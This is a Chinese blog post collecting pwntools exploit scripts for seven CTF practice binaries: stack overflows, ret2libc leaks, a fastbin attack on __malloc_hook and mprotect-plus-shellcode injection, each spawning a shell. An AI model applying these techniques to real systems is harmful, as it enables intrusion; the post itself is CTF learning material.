Whitea's Blog.

buuoj刷题pwn部分

pwn ctf
字数统计: 1.2k阅读时长: 7 min
2019/11/18 Share

warmup_csaw_2016

exp1:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from pwn import *
import sys
from LibcSearcher import *
context.log_level='debug'
context.arch='amd64'

# file_name=ELF("./")
# libc=ELF("./")
# ELF("/lib/x86_64-linux-gnu/libc.so.6")
if args['REMOTE']:
    sh = remote(sys.argv[1], sys.argv[2])
else:
    sh = process("./warmup_csaw_2016")


sh.recvuntil("WOW:0x")
flag = int(sh.recv(6),16)
print hex(flag)

payload = "a"*0x40 + 'b'*8 + p64(flag)
sh.sendafter(">",payload)

sh.interactive()
print(sh.recv())

exp2:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
from pwn import *
import sys
from LibcSearcher import *
context.log_level='debug'
context.arch='amd64'

elf=ELF("./warmup_csaw_2016")
#libc=ELF("./")
# ELF("/lib/x86_64-linux-gnu/libc.so.6")
if args['REMOTE']:
    sh = remote(sys.argv[1], sys.argv[2])
else:
    sh = process("./warmup_csaw_2016")


p_rdi_ret = 0x0000000000400713
p_rsi_r15_ret = 0x0000000000400711
sh.recvuntil("WOW:0x")
flag = int(sh.recv(6),16)
print hex(flag)

payload = "a"*0x40 + 'b'*8
payload += p64(p_rdi_ret) + p64(1) + p64(p_rsi_r15_ret) + p64(elf.got['write']) + p64(0)
payload += p64(elf.plt['write']) + p64(0x00000000040061D)
sh.sendlineafter(">",payload)

libc_write = u64(sh.recv(6).ljust(8,"\x00"))
print "libc_write=>" + hex(libc_write)
libc = LibcSearcher("write",libc_write)

libc_base = libc_write - libc.dump("write")
system = libc_base + libc.dump("system")
binsh = libc_base + libc.dump("str_bin_sh")
payload = "a"*0x40 + 'b'*8
payload += p64(p_rdi_ret) + p64(binsh) + p64(system)*2
sh.sendlineafter(">",payload)


sh.interactive()
print(sh.recv())

ciscn_2019_c_1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from pwn import *
import sys
from LibcSearcher import *
context.log_level='debug'
# context.arch='amd64'

elf=ELF("./ciscn_2019_c_1")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
# ELF("/lib/x86_64-linux-gnu/libc.so.6")
if args['REMOTE']:
    sh = remote(sys.argv[1], sys.argv[2])
else:
    sh = process("./ciscn_2019_c_1")

p_rdi_ret = 0x0000000000400c83
p_rsi_r15_ret = 0x0000000000400c81

sh.sendlineafter("!\n","1")

pading = "a"*0x50 + "b"*8
payload = pading + p64(p_rdi_ret) + p64(elf.got['puts'])
payload += p64(elf.plt['puts']) + p64(0x0000000004009A0)
sh.recvuntil("encrypted\n")
sh.sendline(payload)
sh.recvuntil("\x83\x0c\x40\x0a")
libc_puts = u64(sh.recv(6).ljust(8,"\x00"))
libc_offset = libc_puts - libc.sym['puts']

system = libc_offset + libc.sym['system']
binsh = libc_offset + libc.search("/bin/sh").next()
sh.recvuntil("encrypted\n")
payload2 = pading + p64(p_rdi_ret) + p64(binsh) + p64(system) + p64(0)
sh.sendline(payload2)

sh.interactive()
print(sh.recv())

pwn1_sctf_2016

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *
from LibcSearcher import *
context.log_level='debug'

if args['REMOTE']:
    sh = remote(sys.argv[1], sys.argv[2])
else:
    sh = process("./pwn1_sctf_2016")

payload="I"*20 +"a"*4+ p32(0x08048F0D)

sh.sendline(payload)
sh.interactive()

ciscn_2019_n_1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from pwn import *
import sys
from LibcSearcher import *
context.log_level='debug'
# context.arch='amd64'

elf=ELF("./ciscn_2019_n_1")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
# ELF("/lib/x86_64-linux-gnu/libc.so.6")
if args['REMOTE']:
    sh = remote(sys.argv[1], sys.argv[2])
else:
    sh = process("./ciscn_2019_n_1")

pading = "a"*0x30 + 'b'*8
p_rdi_ret = 0x0000000000400793
p_rsi_r15_ret = 0x0000000000400791

payload=pading + p64(p_rdi_ret) + p64(elf.got['puts'])
payload += p64(elf.plt['puts']) + p64(elf.sym['func'])


sh.recvuntil("number.\n")
sh.sendline(payload)
sh.recvuntil("\x31\x32\x35\x0a")

libc_puts = u64(sh.recv(6).ljust(8,"\x00"))
libc_base = libc_puts - libc.sym['puts']

system = libc_base + libc.sym['system']
binsh = libc_base + libc.search("/bin/sh").next()
payload=pading + p64(p_rdi_ret) + p64(binsh)
payload += p64(system) + p64(elf.sym['func'])
sh.recvuntil("number.\n")
sh.sendline(payload)

sh.interactive()
print(sh.recv())

babyheap_0ctf_2017

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
from pwn import *
context.log_level='debug'
# context.arch='amd64'

elf=ELF("./babyheap_0ctf_2017")
libc=ELF("./libc.so.6")

if args['REMOTE']:
    sh = remote(sys.argv[1], sys.argv[2])
else:
    sh = process("./babyheap_0ctf_2017")

def create(Size):
	sh.recvuntil("Command: ")
	sh.sendline("1")
	sh.recvuntil("Size: ")
	sh.sendline(str(int(Size)))
def edit(Index,Size,Content):
	sh.recvuntil("Command: ")
	sh.sendline("2")
	sh.recvuntil("Index: ")
	sh.sendline(str(Index))
	sh.recvuntil("Size: ")
	sh.sendline(str(int(Size)))
	sh.recvuntil("Content: ")	
	sh.send(Content)
def delete(Index):
	sh.recvuntil("Command: ")
	sh.sendline("3")
	sh.recvuntil("Index: ")
	sh.sendline(str(Index))
def show(Index):
	sh.recvuntil("Command: ")
	sh.sendline("4")
	sh.recvuntil("Index: ")
	sh.sendline(str(Index))

create(0x10) #0
create(0x10) #1
create(0x80) #2
create(0x10) #3

edit(0,0x20,p64(0)*3+p64(0x41))
edit(2,0x20,p64(0)*3+p64(0x71))
delete(1)
create(0x30) #1
edit(1,0x20,p64(0)*3+p64(0x91))
delete(2)
show(1)
sh.recvuntil("\x91"+"\x00"*7)
leak=u64(sh.recv(6).ljust(8,"\x00"))
print "leak=>" + hex(leak)
libc_base = leak-0x3c4b78
malloc_hook = libc_base+libc.sym['__malloc_hook']
print "malloc_hook=>" + hex(malloc_hook)
create(0x60)#2
delete(2)
edit(1,0x28,p64(0)*3+p64(0x71)+p64(malloc_hook-35))
create(0x60)#2
create(0x60)#3
one_gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
one = libc_base + one_gadget[1]
edit(4,27,"a"*19 + p64(one))
create(0x10) #4
#gdb.attach(sh)
sh.interactive()
print(sh.recv())

[OGeek2019]babyrop

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
from pwn import *
import sys
from LibcSearcher import *
context.log_level='debug'
# context.arch='amd64'

elf=ELF("./pwn")
libc=ELF("/lib32/libc.so.6")
# ELF("/lib/x86_64-linux-gnu/libc.so.6")
if args['REMOTE']:
    sh = remote(sys.argv[1], sys.argv[2])
else:
    sh = process("./pwn")

sh.sendline("\0"+"\xff"*19)
sh.recvuntil("Correct\n")
payload = "a"*0xE7+'bbbb'
payload += p32(elf.plt['puts']) + p32(0x08048825) + p32(elf.got['puts'])

sh.sendline(payload)
libc_puts = u32(sh.recv(4))
libc_base = libc_puts-libc.sym['puts']
system = libc_base + libc.sym['system']
binsh = libc_base + libc.search("/bin/sh").next()


sh.sendline("\0"+"\xff"*19)
sh.recvuntil("Correct\n")
payload = "a"*0xE7+'bbbb' + p32(system) + 'bbbb'+ p32(binsh)
sh.sendline(payload)

sh.interactive()
print(sh.recv())

get_started_3dsctf_2016

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from pwn import *
import sys
from LibcSearcher import *
context.log_level='debug'
# context.arch='amd64'

elf=ELF("./get_started_3dsctf_2016")
# libc=ELF("./")
# ELF("/lib/x86_64-linux-gnu/libc.so.6")
if args['REMOTE']:
    sh = remote(sys.argv[1], sys.argv[2])
else:
    sh = process("./get_started_3dsctf_2016")


p3_ret = 0x0804f460
payload="a"*0x38 + p32(elf.symbols['mprotect'])
payload += p32(p3_ret) + p32(0x80eb000) + p32(0x3000) + p32(7)
payload += p32(elf.symbols['read']) + p32(p3_ret) + p32(0) + p32(0x80ebf80) + p32(0x200) +  p32(0x80ebf80)

sh.sendline(payload)
sh.sendline(asm(shellcraft.sh()))
sh.interactive()
print(sh.recv())

原文作者:白山�?

原文链接:https://blog.fjt1.com/2019/11/18/buuoj%E5%88%B7%E9%A2%98pwn%E9%83%A8%E5%88%86/

发表日期:November 18th 2019, 10:41:00 pm

更新日期:November 18th 2019, 10:41:43 pm

版权声明:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. warmup_csaw_2016
  2. 2. ciscn_2019_c_1
  3. 3. pwn1_sctf_2016
  4. 4. ciscn_2019_n_1
  5. 5. babyheap_0ctf_2017
  6. 6. [OGeek2019]babyrop
  7. 7. get_started_3dsctf_2016
Total : 9
2019
pwn ctf stack 博客 学习日记 heap
ctf 博客